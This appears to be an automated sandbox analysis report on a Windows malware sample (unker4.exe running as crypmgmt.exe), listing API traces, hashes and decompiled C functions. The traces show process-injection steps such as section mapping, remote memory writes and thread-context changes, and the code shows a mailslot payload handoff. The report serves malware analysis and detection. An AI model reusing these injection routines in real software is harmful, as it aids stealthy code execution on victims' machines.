Instruction Fuzzy Hash: 55344035e386b307fdbdb0087fb3924a77938adfeec028a63dbf343d589967b5

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,002E7494,002E1728,?,002E7494), ref: 002E2A0A
GetVersion.KERNEL32(?,002E7494), ref: 002E2A19
GetCurrentProcessId.KERNEL32(?,002E7494), ref: 002E2A30
OpenProcess.KERNEL32(0010047A,00000000,00000000,?,002E7494), ref: 002E2A49

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E2CD0, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 108 Total matches: 183string

Similarity

Total matches: 183
API ID: lstrcpy$CoInitializeExCoUninitializePathFindExtensionShellExecuteExlstrlenmemsetwsprintf
String ID: <
API String ID: 1457465641-4251816714
Opcode ID: 3f2b9fcc2af1264bbed65c952509bd9e2800f2d6ba6530589bf9dcfa6290030a
Instruction ID: 90736e0f68e5538e275b6e56e125247b4719fc3da7e88937ca4107ae998a2e85
Opcode Fuzzy Hash: 03F0AC60AB2683C5CCF35840E54579D87C06B21A79C8C4B315508F45A77F28325F4F6C
Instruction Fuzzy Hash: 90736e0f68e5538e275b6e56e125247b4719fc3da7e88937ca4107ae998a2e85

APIs

memset.NTDLL ref: 002E2CEE
CoInitializeEx.OLE32(00000000,00000002), ref: 002E2CF9
PathFindExtensionW.SHLWAPI(00000000), ref: 002E2D14
lstrcpyW.KERNEL32(00000000,002E8224), ref: 002E2D29
lstrlen.KERNEL32(002E7494,?,?,?,?,?,?,?,?,?,?,002E18D7,?), ref: 002E2D46
lstrcpyW.KERNEL32(00000000,002E84B8), ref: 002E2D77

Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168

wsprintfW.USER32 ref: 002E2DAE
ShellExecuteExW.SHELL32(0000003C), ref: 002E2DE3
CoUninitialize.OLE32 ref: 002E2DF7

Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D

Strings

<, xrefs: 002E2DC2

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E4B0D, Relevance: 9.0, APIs: 6, Instructions: 40 Total matches: 320file

Similarity

Total matches: 320
API ID: GetLastError$CloseHandleCreateFileSetEndOfFileWriteFile
String ID:
API String ID: 3756146440-0
Opcode ID: 13a3fbb8c54243ae1405e1c57313f2c46c53332a02a93cc9283264dcae27056a
Instruction ID: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
Opcode Fuzzy Hash: 49D0224D1F030BD4C82394A2E0C2F10C6823F32100D3C022402082836B8F3631EFDE6D
Instruction Fuzzy Hash: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0

APIs

CreateFileW.KERNEL32(002E7494,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 002E4B26
GetLastError.KERNEL32(?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B33
WriteFile.KERNEL32(00000000,?,00001000,002E7494,00000000), ref: 002E4B49
SetEndOfFile.KERNEL32(00000000,?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B54
GetLastError.KERNEL32(?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B5C
CloseHandle.KERNEL32(00000000), ref: 002E4B65

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E4A60, Relevance: 7.6, APIs: 5, Instructions: 72 Total matches: 377file

Similarity

Total matches: 377
API ID: CloseHandleCreateFileGetFileSizeGetLastErrorReadFile
String ID:
API String ID: 1827773359-0
Opcode ID: 9f3baee91e90600c7ef65055cc937090c80b1848b2f2516f31576c2ec84c2916
Instruction ID: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
Opcode Fuzzy Hash: 80E02608AE0A47CCD46B9C42D482F00A7826F61609DAD39655208293734F2132AFEB3C
Instruction Fuzzy Hash: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f

APIs

CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002E4A7E
GetFileSize.KERNEL32(00000000,00000000,?,?,002E2AF0,002E74BC,?,?,?,B.,002E2FAC,?,?), ref: 002E4A8E

Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168

ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 002E4ABA
GetLastError.KERNEL32(?,?,002E2AF0,002E74BC,?,?,?,B.,002E2FAC,?,?), ref: 002E4ADF
CloseHandle.KERNEL32(000000FF), ref: 002E4AF0

Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E2175, Relevance: 6.1, APIs: 4, Instructions: 107 Total matches: 388threadsynchronizationinjection

Similarity

Total matches: 388
API ID: ResumeThreadSuspendThreadWaitForSingleObjectmemset
String ID:
API String ID: 4069891769-0
Opcode ID: 97ca6bb9ca5fe7b510779c132f311c73afcc437a32033944fe2e30fe2d70fbee
Instruction ID: 389f8e6b2b9a9dadd75e162c423f4892cc8029b080c4ee30251df583d1f82c9e
Opcode Fuzzy Hash: B5019C47292A71C6D501A8068699739F1C3FB42EBAE2CF700D6C1B01DA0ED479F2DB6C
Instruction Fuzzy Hash: 389f8e6b2b9a9dadd75e162c423f4892cc8029b080c4ee30251df583d1f82c9e

APIs

memset.NTDLL ref: 002E21A3

Part of subcall function 002E1FFA: memset.NTDLL ref: 002E2036

ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 002E222D
WaitForSingleObject.KERNEL32(00000064), ref: 002E223B
SuspendThread.KERNEL32(?), ref: 002E224E

Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,?,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1DE0
Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1E2F
Part of subcall function 002E1CB2: memcpy.NTDLL(?,002E24F9,00000800,?,?,?,00000000), ref: 002E1E9F
Part of subcall function 002E1CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 002E1ECA
Part of subcall function 002E1CB2: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E1ED1
Part of subcall function 002E1CB2: CloseHandle.KERNEL32(00000000), ref: 002E1EE0
Part of subcall function 002E1CB2: memset.NTDLL ref: 002E1EF4

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E372A, Relevance: 5.1, APIs: 4, Instructions: 110 Total matches: 409

Similarity

Total matches: 409
API ID: GetLastError$memcpymemset
String ID:
API String ID: 1724464136-0
Opcode ID: 752983b3e7944d967bfc605664b24e9bd319d7a804b265e52fc9e08d56eeb1c9
Instruction ID: ba4a7f234d9ebbe4fc635900303f1b764cd23262994ffbb79c20cb6415721215
Opcode Fuzzy Hash: C60170421A6E65C8F471D947689AB3BF487FF967F6D09F70020C23028E4E8061D71F89
Instruction Fuzzy Hash: ba4a7f234d9ebbe4fc635900303f1b764cd23262994ffbb79c20cb6415721215

APIs

memset.NTDLL ref: 002E3750
memcpy.NTDLL ref: 002E3778

Part of subcall function 002E3E68: NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
Part of subcall function 002E3E68: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
Part of subcall function 002E3E68: SetLastError.KERNEL32(00000000), ref: 002E3EA7

GetLastError.KERNEL32(00000010,00000218,002E4F6D,00000100,?,00000318,00000008), ref: 002E378F

Part of subcall function 002E3E27: NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
Part of subcall function 002E3E27: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
Part of subcall function 002E3E27: SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B

GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,002E4F6D,00000100), ref: 002E3872

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Process Name: crypmgmt.exe Analysis ID: 57932

General

Root Process Name:	Zx7i3Q9U9i.exe
Process MD5:	0520E2BE92296DE286739115ACA14892
Total matches:	34
Initial Analysis Report:	Open
Initial sample Analysis ID:	57932
Initial sample SHA 256:	D4883169ADA9F2D88BB36D2A05634A56C26DF3CBEEDF9D8A2DA073CDB049F46D
Initial sample name:	unker4.exe

Similar Executed Functions

Function 002E3122, Relevance: 10.6, APIs: 7, Instructions: 81 Total matches: 84native

Similarity

Total matches: 84
API ID: NtCloseNtQueryInformationToken$NtOpenProcessNtOpenProcessTokenmemcpy
String ID:
API String ID: 1776017925-0
Opcode ID: e71ad6eecb970af1def45c3799b202ba83529c651fa6d32aa02a68984f086bcb
Instruction ID: f4d3a45514e2a78a6ff484cd6517dbf474bab809adfac8e8e781d73a1b5f56bc
Opcode Fuzzy Hash: 7BE0F1411C06C3F798EA64406103F84D7A0FE10A51C9C6B16C1F87E1D00F30305F5A2F
Instruction Fuzzy Hash: f4d3a45514e2a78a6ff484cd6517dbf474bab809adfac8e8e781d73a1b5f56bc

APIs

NtOpenProcess.NTDLL(002E618C,00000400,?,002E7494), ref: 002E316A
NtOpenProcessToken.NTDLL(002E618C,00000008,00000000), ref: 002E317D
NtQueryInformationToken.NTDLL(00000000,00000001,00000000,00000000,002E618C), ref: 002E3198

Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168

NtQueryInformationToken.NTDLL(00000000,00000001,00000000,002E618C,002E618C,002E618C), ref: 002E31B5
memcpy.NTDLL(00000000,00000000,0000001C), ref: 002E31C2

Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D

NtClose.NTDLL(00000000), ref: 002E31D4
NtClose.NTDLL(002E618C), ref: 002E31DD

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E3880, Relevance: 7.6, APIs: 5, Instructions: 93 Total matches: 233nativethread

Similarity

Total matches: 233
API ID: GetLastErrorNtSetContextThreadRtlNtStatusToDosErrormemcpymemset
String ID:
API String ID: 405287775-0
Opcode ID: 16422fa5cbcf997cf8d8ddf4094cfe996cac4ccb4206dd4e90c3df64a56a7186
Instruction ID: 4ee8f91e38277187f96cecbc10f2c4ddb51f95b78ca4709a1d369a7576d9c959
Opcode Fuzzy Hash: FEF00C400F9BA0EBF812B6821491F547683BB02F32E0EF32051F200B863F02200E8B1A
Instruction Fuzzy Hash: 4ee8f91e38277187f96cecbc10f2c4ddb51f95b78ca4709a1d369a7576d9c959

APIs

memset.NTDLL ref: 002E38A2
GetLastError.KERNEL32(?,00000318,00000008), ref: 002E3995

Part of subcall function 002E3E68: NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
Part of subcall function 002E3E68: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
Part of subcall function 002E3E68: SetLastError.KERNEL32(00000000), ref: 002E3EA7

Part of subcall function 002E3DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3DDD

memcpy.NTDLL(00000218,002E4F92,00000100,?,00010003,?,?,00000318,00000008), ref: 002E391D

Part of subcall function 002E3E27: NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
Part of subcall function 002E3E27: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
Part of subcall function 002E3E27: SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B

NtSetContextThread.NTDLL(00000000,00010003,?,00000000,00000000,00000318,00000010,?,00010003,?,?,00000318,00000008), ref: 002E3974
RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3977

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E278F, Relevance: 6.1, APIs: 4, Instructions: 79 Total matches: 297native

Similarity

Total matches: 297
API ID: NtCloseNtCreateSectionRtlNtStatusToDosErrormemset
String ID:
API String ID: 2756933261-0
Opcode ID: b4b338d5d8f61f66a6222dbf3d0f3f210939ec075dfbdcc0bd39eb5c8c15d6ad
Instruction ID: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
Opcode Fuzzy Hash: FCE0C04226CAC4E7E9F2F8451403B2B9140BF80142D5D7BA663A88D67F0F20B0031B1E
Instruction Fuzzy Hash: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794

APIs

NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 002E27EA
memset.NTDLL ref: 002E280F
RtlNtStatusToDosError.NTDLL(00000000), ref: 002E282B
NtClose.NTDLL(?), ref: 002E283F

Part of subcall function 002E2750: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 002E277D
Part of subcall function 002E2750: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E2784

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E3E68, Relevance: 4.5, APIs: 3, Instructions: 29 Total matches: 229memorynative

Similarity

Total matches: 229
API ID: NtAllocateVirtualMemoryRtlNtStatusToDosErrorSetLastError
String ID:
API String ID: 3367774474-0
Opcode ID: 41e13fcf86dc4b3d751067dcd296ed22fbfc5f147028583741b35f2a38466cce
Instruction ID: 9d0754b4a53c7716e52a0dbaf66079789dacaff85707c89c3e4538a0fd9930dd
Opcode Fuzzy Hash: B0C012801C1D82EAD57B9488419DB2A119677A1101C1D733211809D5407FA0305B0F1D
Instruction Fuzzy Hash: 9d0754b4a53c7716e52a0dbaf66079789dacaff85707c89c3e4538a0fd9930dd

APIs

NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
SetLastError.KERNEL32(00000000), ref: 002E3EA7

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E3E27, Relevance: 4.5, APIs: 3, Instructions: 26 Total matches: 236native

Similarity

Total matches: 236
API ID: NtWriteVirtualMemoryRtlNtStatusToDosErrorSetLastError
String ID:
API String ID: 1449157707-0
Opcode ID: 2ed1afa1f8d583104eaac44049c4c607334b4aa5ab8e72b653f2dcbc79efa973
Instruction ID: 8cccbe2df0253c9c18979b1fa8fd50b07792896aeb97b9ed1177a34a95bdebaa
Opcode Fuzzy Hash: 95C0928B1505C74DDB3AA98181EEF4DC2C57FB177342C31094088C972E598A326B4E49
Instruction Fuzzy Hash: 8cccbe2df0253c9c18979b1fa8fd50b07792896aeb97b9ed1177a34a95bdebaa

APIs

NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E3DE6, Relevance: 4.5, APIs: 3, Instructions: 26 Total matches: 238native

Similarity

Total matches: 238
API ID: NtReadVirtualMemoryRtlNtStatusToDosErrorSetLastError
String ID:
API String ID: 3946382534-0
Opcode ID: aed4696055f3d46c6fa4a2efaa20ff5ea458cda21972fc3345feb9d6d727ddb0
Instruction ID: a9cdfd71e4bef7ffe137eafdadfb13b9e2c13e58845fd9648d6a85622cd56536
Opcode Fuzzy Hash: 09C092CB1415C74DDB3AA99281EAF4DC2C57EB177342C31094088C971E598A366B4E49
Instruction Fuzzy Hash: a9cdfd71e4bef7ffe137eafdadfb13b9e2c13e58845fd9648d6a85622cd56536

APIs

NtReadVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084), ref: 002E3E04
RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E13
SetLastError.KERNEL32(00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E3E1A

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 00401639, Relevance: 16.6, APIs: 11, Instructions: 85 Total matches: 95
threadsynchronization

Similarity

Total matches: 95
API ID: CloseHandleCreateThreadGetExitCodeThreadGetLastErrorWaitForSingleObject$TerminateThread
String ID:
API String ID: 2699342322-0
Opcode ID: cbe0259121293ce785fa7e3a9f1ca2c81b7074ba88f55b4f5292b4e6af892abb
Instruction ID: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
Opcode Fuzzy Hash: AFF089CB049AC2E5412D34407422FE79092DF92683D1CA6612EDE3664B1F51711BFA1E
Instruction Fuzzy Hash: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82

C-Code - Quality: 100%

			E00401639(intOrPtr __eax, long _a4) {
				void* _v8;
				long _v12;
				void* _v16;
				void _v28;
				void* __ebx;
				void* _t29;
				void* _t34;
				long _t45;
				void* _t47;
				void* _t51;

				 *0x40305c = __eax;
				_v28 = _a4;
				 *0x4030e8 = 0x736c6e70; // executed
				_t29 = CreateThread(0, 0, E00401034,  &_v28, 0,  &_v12); // executed
				_v8 = _t29;
				if(_t29 == 0) {
					_a4 = GetLastError();
				} else {
					_t34 = CreateThread(0, 0, E004010FB,  &_v28, 0,  &_v12); // executed
					_t47 = _t34;
					_v16 = _t47;
					if(_t47 == 0) {
						_a4 = GetLastError();
					} else {
						_a4 = 0;
						WaitForSingleObject(_t47, 0xffffffff); // executed
						if(GetExitCodeThread(_t47,  &_a4) == 0 || _a4 != 0) {
							TerminateThread(_v8, _a4);
						} else {
							WaitForSingleObject(_v8, 0xffffffff);
							if(GetExitCodeThread(_v8,  &_a4) != 0 && _a4 == 0) {
								_t45 = E00401593( &_v28, _t51); // executed
								_a4 = _t45;
							}
						}
						CloseHandle(_v16);
					}
					CloseHandle(_v8);
				}
				return _a4;
			}

APIs

CreateThread.KERNEL32(00000000,00000000,00401034,?,00000000,?), ref: 0040166E
CreateThread.KERNEL32(00000000,00000000,004010FB,?,00000000,?), ref: 0040168C
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016A3
GetExitCodeThread.KERNEL32(00000000,?,?,?,00000000), ref: 004016B0
WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016C0
GetExitCodeThread.KERNEL32(?,?,?,?,00000000), ref: 004016C9

Part of subcall function 00401593: VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,00000000,757DC470,004016DC,?,?,00000000), ref: 004015B9

TerminateThread.KERNEL32(?,?,?,?,00000000), ref: 004016E7
CloseHandle.KERNEL32(?), ref: 004016F0
GetLastError.KERNEL32(?,?,00000000), ref: 004016F8
CloseHandle.KERNEL32(?), ref: 00401704
GetLastError.KERNEL32(?,00000000), ref: 0040170D

Memory Dump Source

Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
Associated: 00000001.00000002.556350474.00404000.00000008.sdmp

Function 004010FB, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 90 Total matches: 95
sleepfile

Similarity

Total matches: 95
API ID: GetLastErrorSleep$CloseHandleCreateFileWriteFilememset
String ID: \\.\mailslot\msl0
API String ID: 1001206095-622273203
Opcode ID: 003b2913688191ea114162166813de589c119e69325853280e698207d87bc8a2
Instruction ID: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
Opcode Fuzzy Hash: DFF02E85425EC28BC77E20443911BE16086B782F42C6CC3B29ED2342AB8F40710A9746
Instruction Fuzzy Hash: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981

C-Code - Quality: 94%

			E004010FB(void* __ebx, void* __edi, void* _a4) {
				struct _SECURITY_ATTRIBUTES* _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _v24;
				void* _t28;
				void* _t34;
				int _t39;
				long _t40;
				long _t43;
				void* _t45;
				long _t46;
				void* _t48;
				void* _t52;

				_t48 = __edi;
				_t45 = __ebx;
				_v8 = 0;
				do {
					_t28 = CreateFileA("\\\\.\\mailslot\\msl0", 0x40000000, 3, 0, 3, 0, 0); // executed
					_v20 = _t28;
					if(_t28 != 0xffffffff) {
						_v12 = 0;
					} else {
						_v12 = GetLastError();
						Sleep(0x64);
					}
				} while (_v12 == 2);
				if(_v12 != 0) {
					L19:
					return _v12;
				}
				_t34 = E0040171F( *_a4,  &_a4,  &_v24); // executed
				if(_t34 == 0) {
					_v12 = 0xb;
					L18:
					CloseHandle(_v20);
					goto L19;
				}
				_t52 = _a4;
				_push(_t45);
				_t46 = _v24;
				_push(_t48);
				do {
					_v16 = _t46;
					if(_t46 >= 0x1000) {
						_v16 = 0x1000;
					}
					_t39 = WriteFile(_v20, _v8 + _t52, _v16,  &_v16, 0); // executed
					if(_t39 == 0) {
						_t40 = GetLastError();
						_v12 = _t40;
						if(_t40 != 0x79) {
							break;
						}
					} else {
						_t43 = _v16;
						_v8 = _v8 + _t43;
						_t46 = _t46 - _t43;
						if(_t46 == 0 && _t43 == 0x1000) {
							_t46 = _t46 + 1;
							_v8 = _v8 - 1;
						}
					}
					Sleep(0x64); // executed
				} while (_t46 != 0);
				memset(_t52, 0, _v8);
				E00401207(_t52);
				goto L18;
			}

APIs

CreateFileA.KERNEL32(\\.\mailslot\msl0,40000000,00000003,00000000,00000003,00000000,00000000), ref: 00401118
GetLastError.KERNEL32 ref: 00401126
Sleep.KERNEL32(00000064), ref: 00401131

Part of subcall function 0040171F: memcpy.NTDLL(?,?,?,?,?,00000000), ref: 00401806

WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0040118A
GetLastError.KERNEL32(?,?,00000002,?), ref: 004011A8
Sleep.KERNELBASE(00000064,?,?,00000002,?), ref: 004011B8
memset.NTDLL ref: 004011C8

Part of subcall function 00401207: HeapFree.KERNEL32(00000000,00401589,00401589), ref: 00401213

CloseHandle.KERNEL32(?), ref: 004011E4

Strings

\\.\mailslot\msl0, xrefs: 00401113

Memory Dump Source

Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
Associated: 00000001.00000002.556350474.00404000.00000008.sdmp

Function 002E1224, Relevance: 13.6, APIs: 9, Instructions: 77 Total matches: 182registrymemorystring

Similarity

Total matches: 182
API ID: HeapFreePathFindFileNameRegCloseKeyRegOpenKeyExRegQueryValueExRtlAllocateHeapStrStrIlstrcmpilstrlen
String ID:
API String ID: 1756712956-0
Opcode ID: f2f8398e5a378612a0451dc2799ca230d083f10daad558b8caa29df948c1a906
Instruction ID: 30042301f3adacd9a37cbdbd114ab521d6accad2819432d9e9ed4dab324ad14b
Opcode Fuzzy Hash: 73F027808E89B3CAC953D045D9CE7B64644BF90B5FC8C13A02480291551F6034EB3B5D
Instruction Fuzzy Hash: 30042301f3adacd9a37cbdbd114ab521d6accad2819432d9e9ed4dab324ad14b

APIs

PathFindFileNameW.SHLWAPI(002E618C), ref: 002E1246
lstrcmpiW.KERNEL32(00000000,?,002E7494), ref: 002E124D
RegOpenKeyExA.KERNEL32(80000001,002E8080,00000000,00000000,?,?,002E7494), ref: 002E127E
lstrlenW.KERNEL32(?,002E7494), ref: 002E1292
RtlAllocateHeap.NTDLL(00000000,?), ref: 002E12AA
RegQueryValueExW.KERNEL32(?,00000000,002E7494,00000000,002E7494,?,002E7494), ref: 002E12C9
StrStrIW.SHLWAPI(00000000), ref: 002E12E4
HeapFree.KERNEL32(00000000,00000000), ref: 002E12F9
RegCloseKey.ADVAPI32(?,?,002E7494), ref: 002E1302

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E1093, Relevance: 10.6, APIs: 7, Instructions: 67 Total matches: 199memorythread

Similarity

Total matches: 199
API ID: CloseHandleCreateThreadHeapCreateHeapDestroyInterlockedDecrementInterlockedIncrementSleepEx
String ID:
API String ID: 2400451634-0
Opcode ID: 20a1fe1949787535bd79f47ccd9ae32a5e8064993f8506e11f38a0a49419feba
Instruction ID: e3622a5643dd5bc20198795b8622ff9421b7fcc2ec09b542b244e7cafd184775
Opcode Fuzzy Hash: E2E02B881E4839C7857E180AD1DCF7102617FE1A5D9DC93511254561614F1DA0F77E8C
Instruction Fuzzy Hash: e3622a5643dd5bc20198795b8622ff9421b7fcc2ec09b542b244e7cafd184775

APIs

InterlockedIncrement.KERNEL32(002E7448), ref: 002E10B0
HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 002E10C5

Part of subcall function 002E1000: memcpy.NTDLL(002E7570,?,0000000C,002E6248,0000000C,002E10E9,?,00000000,?), ref: 002E1038

CreateThread.KERNEL32(00000000,00000000,Function_0000005B,00000000,?,00000000), ref: 002E10F1
InterlockedDecrement.KERNEL32(002E7448), ref: 002E1109
SleepEx.KERNEL32(00000064,00000001), ref: 002E1125
CloseHandle.KERNEL32 ref: 002E1141
HeapDestroy.KERNEL32 ref: 002E114E

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 00401033, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64 Total matches: 190
memorysleepfile

Similarity

Total matches: 190
API ID: GetLastError$CloseHandleCreateMailslotHeapReAllocReadFileSleep
String ID: \\.\mailslot\msl0
API String ID: 2393858888-622273203
Opcode ID: a3ceb4dbf8eec70be79f35f386a0360ab8bfc7ba483ab19be25d62c214bd66f1
Instruction ID: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
Opcode Fuzzy Hash: 18E026820629C5C6567F100A28013B360CBBB7174BDDEE7600AA7391830F823017964A
Instruction Fuzzy Hash: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395

C-Code - Quality: 96%

			E00401033(void* _a4) {
				signed int _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _t24;
				long _t25;
				void* _t27;
				int _t32;
				long _t33;
				void* _t34;
				void* _t36;
				long _t39;

				_pop(_t41);
				_t39 = 0;
				_v8 = 0x1000;
				_t24 = CreateMailslotA("\\\\.\\mailslot\\msl0", 0x1000, 0, 0);
				_v16 = _t24;
				if(_t24 == 0) {
					_t25 = GetLastError();
					_t36 = _a4;
					_v8 = _t25;
				} else {
					_t36 = E004011F2(0x1000);
					if(_t36 == 0) {
						L10:
						_v8 = 8;
					} else {
						do {
							_t32 = ReadFile(_v20, _t36 + _t39, 0x1000,  &_v16, 0); // executed
							if(_t32 == 0) {
								_t33 = GetLastError();
								_v8 = _t33;
								if(_t33 == 0x79) {
									_v16 = 0x1000;
									goto L8;
								}
							} else {
								_v12 = _v12 + 0x1000;
								_t39 = _t39 + _v16;
								_t34 = HeapReAlloc( *0x40305c, 0, _t36, _v12); // executed
								_t36 = _t34;
								if(_t36 == 0) {
									goto L10;
								} else {
									_v8 = _v8 & 0x00000000;
									goto L8;
								}
							}
							goto L11;
							L8:
							Sleep(0x64); // executed
						} while (_v16 == 0x1000);
					}
					L11:
					CloseHandle(_v20);
				}
				if(_v8 == 0) {
					_t27 = _a4;
					 *(_t27 + 4) = _t36;
					 *((intOrPtr*)(_t27 + 8)) = _t39;
				}
				return _v8;
			}

APIs

CreateMailslotA.KERNEL32(\\.\mailslot\msl0,00001000,00000000,00000000), ref: 0040104F
GetLastError.KERNEL32 ref: 004010D6

Part of subcall function 004011F2: RtlAllocateHeap.NTDLL(00000000,00000000,00401543,00000208,00000000,?,004015FD,?,00000000,?,00000000,?,?,?,00000000), ref: 004011FE

ReadFile.KERNEL32(?,?,00001000,?,00000000), ref: 00401076
HeapReAlloc.KERNEL32(00000000,00000000,?), ref: 00401092
GetLastError.KERNEL32 ref: 004010A4
Sleep.KERNELBASE(00000064), ref: 004010B7
CloseHandle.KERNEL32(?), ref: 004010CE

Strings

\\.\mailslot\msl0, xrefs: 00401047

